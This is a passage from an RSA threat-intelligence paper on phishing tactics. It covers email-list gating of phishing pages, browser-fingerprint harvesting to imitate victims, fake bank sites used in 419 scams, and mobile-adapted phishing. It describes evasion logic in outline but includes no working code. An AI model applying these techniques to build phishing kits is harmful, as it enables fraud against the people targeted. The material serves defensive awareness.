Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance, our analysts have witnessed phishing sites that validate their victims by comparing their email address with a long list of confirmed email addresses for a certain region that the fraudster obtained earlier. Some phishing emails are sent with email addresses embedded in the URL’s parameters to make sure that only the people who received the phishing email will be able to access the fraudulent site.

(Code snapshot not reproduced. Its annotations read: make sure the victim’s email address is set in the “id” parameter, otherwise the phishing page won’t be shown; check whether the email is in the list; check whether it is a returning victim; put it in an ignore list to avoid access a second time; if it passed the test, redirect to the phishing page.)


Collecting Statistics

Statistics collection is another popular feature fraudsters like to implement in their attacks. Sometimes it is done using online services, but most of the time this feature is incorporated as part of a phishing kit. User information like screen resolution, IP address, language preferences in the browser, etc. allows fraudsters to mimic a victim’s online “fingerprint” to try and log in to their online accounts, avoiding detection by online-security monitoring solutions deployed on legitimate websites.


The 419 Scam

The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly, enough people still fall victim to this simple and often humorous fictional cover story that purportedly offers to share millions of dollars with the victim, if only they first provide a small deposit to start the process… Now, in order to add greater believability or a trust factor to this scam, fraudsters developed sites that imitate online banking, where the victims are given a set of prepared account credentials to log in. Usually, their name is displayed after they log in, and they can see that there are thousands or millions of dollars in their account. Once they gain this little measure of the victim’s trust, the rest of the standard 419 scam can be played out more easily.

Smartphones Always At Our Side

We are now living in the ‘smartphone era’, where all sorts of tiny mobile devices with vast computing and communication abilities are always at our side. Fraudsters take into consideration that victims are now more ‘attached’ to their email than ever before. Many of us check our messages much more frequently, especially if we have a notification sound set on our device. Accordingly, more and more fraudsters modify their phishing sites to accommodate mobile browsers. Therefore, despite the rising awareness of online fraud in the general population and the media, phishing remains one of the most dangerous cyber-threats.


www.rsa.com

ABOUT RSA

RSA helps more than 30,000 customers around the world take command of their security posture by partnering to build and implement business-driven security strategies. With RSA's award-winning cybersecurity solutions, organizations can effectively detect and respond to advanced attacks; manage user identities and access; and reduce business risk, fraud and cybercrime. For more information, go to www.rsa.com.

ABOUT RSA FRAUDACTION

RSA FraudAction is a managed threat intelligence service which provides global organizations with 24x7 protection and shutdown against phishing, malware, rogue mobile apps and other cyber attacks that impact their business. Supported by 150 analysts in RSA’s Anti-Fraud Command Center, the RSA FraudAction service analyzes millions of potential threats every day and has enabled the shutdown of more than one million cyber attacks.

EMC2, EMC, the EMC logo, RSA, and the RSA logo, are registered trademarks or trademarks of EMC Corporation in the United States and other countries. VMware is a registered trademark or trademark of VMware, Inc., in the United States and other jurisdictions. © Copyright 2016 EMC Corporation. All rights reserved. Published in the USA.